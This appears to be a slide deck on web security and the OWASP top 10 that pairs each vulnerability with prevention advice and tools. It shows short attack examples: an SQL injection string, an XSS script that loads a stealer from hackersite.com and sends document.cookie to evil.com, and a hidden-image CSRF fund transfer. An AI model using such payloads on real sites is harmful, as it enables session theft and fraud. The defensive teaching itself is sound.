Web security and OWASP

Web Security & OWASP
By-Isuru Samaraweera

Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A

What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploits vulnerabilities
• Techniques XSS,Sql Injection etc
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011- 77 million accounts with credit card numbers
• JP Morgan chase 2014 -7.6million account information
• Master Card- 2005 -40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development

OWASP(https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• Webgoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…

OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management (XSS)
• Cross Site Scripting (XSS)
• Broken access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Under protected APIs

(#1)-Injection
• Send untrusted data into the system
• Text based attacks
• External,internal parties
• SQL,LDAP,JPQL,Xpath,Nosql
• String query = "SELECT * FROM user_data WHERE lastName='" +
request.getParameter(“lastName") + "'";
• Query HQLQuery = session.createQuery(“FROM user_data WHERE
lastName ='“ + request.getParameter(“lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1

Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement,SQLCommand,PDO
• Stored procedures
• Input validation
• Carefully escape especial characters if no api is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(#2)-Broken Authentication and Session
Management
• Custom authentication , Session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session id exposed in the url->session fixation
• Session id won’t timeout
• Session ids are not rotated on success logins
• http://website.com/login.php?;jsessionid=
2P0OC2JSNDLPSKHCJUN2JV&d

Protecting the Password
• Hashing
• Transport
• Storage

Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Look up table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup

User Registration with Salt
• App post the username foo@example.com with
Password pass
• Server generates a random salt r
• Server computes h=H(r|pass)
• Server stores (foo@example.com,hash,r) in DB

Simplified login flow
• App Post username foo@example.com and password
Pass
• Server lookup the salt using the user id
• Server compute the hash h’=H(r|’pass’)
• If(foo@example.com,h’) exists in db allow login

Hashing with key and random salt
• Is it safe?

Hashing recipe
• Bind password hash value to account
• Use application secret
• Follow password hashing best practices

Transport Security of a password

Hashing the password on client

Encrypt the password
• Asymmetric encryption
• Problems?

Preventing broken authentication contd…
• Implement Proper Password Strength Controls
• Password Length >10<128
• Pasword Complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation) — do not forget to treat space as special
characters too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)

Preventing broken authentication contd..
• Authentication and Error Messages
• respond with a generic error message
• Incorrect Response Examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active“
• Correct Response example
• "Login failed; Invalid userID or password"

Preventing broken authentication contd..
• Prevent brute force attacks
• Account lock out
• Multifactor authentication
• Logging and Monitoring
• Use of authentication protocols that require no password
• Oauth
• OpenId
• Saml
• Leverage available frameworks and tools
• Apache Shiro
• Spring security
• Owasp esapi
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet

Preventing Session Management issues
• Secure login over Https
• Password submitted encrypted
• Immediate redirect to http
• Session id sent in clear text-<Vulnerability

Preventing Session Management issues contd..
• User requests HTTP page,response redirects to HTTPS
• 302 Response is HTTP Vulnerability point

Preventing Session Management issues contd..
• HSTS –Http Strict Transport Layer security
• Opt-in security control
• Instructs browser upgrade the security for STS
• HSTS forces
• All communications over HTTPS
• No insecure http requests sent from browser
• No option for user to override untrusted certificates

Enabling HSTS
• In Apache add below to .htaccess
• # Use HTTP Strict Transport Security to force client to use secure
connections only
Header always set Strict-Transport-Security "max-
age=300; includeSubDomains; “
Max-age =>The time, in seconds, that the browser should remember that this
site is only to be accessed using HTTPS.
includeSubDomains=>If this optional parameter is specified, this rule applies
to all of the site's subdomains as well.
• Can be done in Nginx,IIS etc

Preventing Session Management issues
contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache,no-store
• Pragma: no-cache
• New session ids on consecutive logins

• https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
• https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_authentication
• https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_
Sheet

(#3)-Cross Site scripting(XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script
src="http://hackersite.com/authstealer.js"> </script>.
• Document.location=http://evil.com?id=document.cookie

Preventing XSS
• Html escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &
• < --> <
• > --> >
• JavaScript Escape Before Inserting Untrusted Data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter(
"input" ) );
• Css Escape Before Inserting Untrusted Data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING
HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );

Preventing XSS contd…
• URL Escape Before Inserting Untrusted Data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE
PUTTING HERE...">link</a >
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS Filters-Block requests with dangerous tags,scripts
• OWASP antisamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• Html sanitizer project
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Che
at_Sheet

(#4)-Broken access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• htttp://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, Automated verification
• Principle of lease privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access

(#5)-Security misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out of date software
• Unnecessary ports,services
• Error message throws stack trace?
• Framework settings set to secure value?(struts,spring,.net etc)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management

(#6)-Sensitive data exposure
• Passwords ,credit card numbers etc (transit or rest)
• Not encrypting sensitive data
• Use weak keys and algorithms to encrypt
• SSL not enabled in the entire path
• Prevention measures
• Encrypt sensitive data accurately
• AES-256
• Key encrypting key
• Hardware security modules
• RSA 2048
• Don’t store sensitive data unnecessarily
• Disable caching and auto completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS

(#7) -Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated
attacks
• Attack with OWASP ZAP,SQL map tools(http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP App sensor
• An input a legitimate client can’t generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks->OWASP App sensor
• Decide whether to automatically block requests,
• IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly

• Monitor log files
• Monitor network bandwidth

• https://www.owasp.org/index.php/OWASP_AppSensor_Project
• https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_A
pplications
• https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_
Sheet
• https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet
• https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_R
ule_Set_Project
• https://www.owasp.org/index.php/Intrusion_Detection

(#8)-Cross Site Request Forgery
• Attacker trick the victim with urls
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccou
nt=4673243243
• Attacker emails below url to the victim
• <img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“ width="0" height="0"
/>

Preventing CSRF
• Include unique token in hiddenfield
• Verify the token on each request
• CSRFGuard
• Reauthenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard

(#9)-Using components with known
vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution(2011/2012)
• Expression Language flow=>Execute arbitrary code on the server
• Struts2 Remote code execution(2017)
• Mishandles file upload
• Content-Type header flow=>Execution of arbitrary code on the server

Preventing Using components with known
vulnerabilities
• Identify all components and dependent libraries
• OWASP_Dependency_Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor security of these components
• Mailing lists
• Official sites
• Security policy on 3rd party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required function in an api
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices

(#10)- Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to remote API(Username,password and accountnum)
• Public SMS JSON API->SQL injection
• XML XXE
• External entity is processed by XML parser
• Prevention
• Secured communications between the client and your APIs.
• Strong authentication scheme for your APIs,
• Parser configuration is hardened against attack.
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet

OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Test ,web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verificatio
n_Standard_Project
• OWASP live CD project
• Best open source security tools into a single bootable environment
• Boot from this Live CD or run VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

General Security Testing tools
• Iron Wasp(https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark(https://www.wireshark.org/)
• Network packet analyzer.
• Google Nogotofail( https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• SQlMap( http://sqlmap.org/)
• Sql Injection
• Qualys(https://www.qualys.com)

Security code review
• Fastest and accurate
• Data Validation
• Authentication
• Session management
• Authorization
• Cryptography
• Error handling
• Logging
• Security Configuration
• Network Architecture
• Tools
• Code crawler
• Orizon
• O2
• FindSecurityBugs

Web security and OWASP

More Related Content

What's hot (20)

Similar to Web security and OWASP (20)

More from Isuru Samaraweera (6)

Recently uploaded (20)

Web security and OWASP